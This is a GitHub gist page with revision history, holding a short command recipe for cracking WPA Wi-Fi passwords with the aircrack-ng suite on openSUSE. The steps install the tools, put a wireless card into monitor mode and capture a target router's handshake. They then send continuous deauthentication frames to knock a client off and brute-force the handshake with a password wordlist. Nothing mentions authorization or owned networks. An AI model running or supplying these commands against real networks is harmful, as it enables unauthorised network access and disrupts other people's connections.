Last active
March 10, 2020 03:30
-
-
Save anlexN/3fcadbaa20e0fc0fe4c2150341b36aeb to your computer and use it in GitHub Desktop.
Revisions
-
anlexN revised this gist
Mar 10, 2020 . 1 changed file with 10 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,3 +1,13 @@ #opensuse ``` zypper addrepo https://download.opensuse.org/repositories/security/openSUSE_Tumbleweed/security.repo zypper refresh zypper install aircrack-ng #if something is missing zypper install ethtool pciutils usbutils iw ``` ```bash airmon-ng airmon-ng start wlan0 -
anlexN revised this gist
Mar 8, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ ```bash airmon-ng airmon-ng start wlan0 iwconfig -
anlexN revised this gist
Mar 8, 2020 . 1 changed file with 3 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,7 +1,9 @@ ``` airmon-ng airmon-ng start wlan0 iwconfig airodump-ng wlan0mon (CTRL-C) airodump-ng -c [ROUTER CH] --bssid [ROUTER MAC] -w wifi/okwifi wlan0mon (wait for handshake) aireplay-ng -0 0 -a [ROUTER MAC] -c [DESTICNATION MAC] wlan0mon (open another terminal) aircrack-ng -w password.txt wifi/okwifi-01.cap ``` -
anlexN created this gist
Mar 8, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,7 @@ airmon-ng airmon-ng start wlan0 iwconfig airodump-ng wlan0mon (CTRL-C) airodump-ng -c [ROUTER CH] --bssid [ROUTER MAC] -w wifi/okwifi wlan0mon (wait for handshake) aireplay-ng -0 0 -a [ROUTER MAC] -c [DESTICNATION MAC] wlan0mon (open another terminal) aircrack-ng -w password.txt wifi/okwifi-01.cap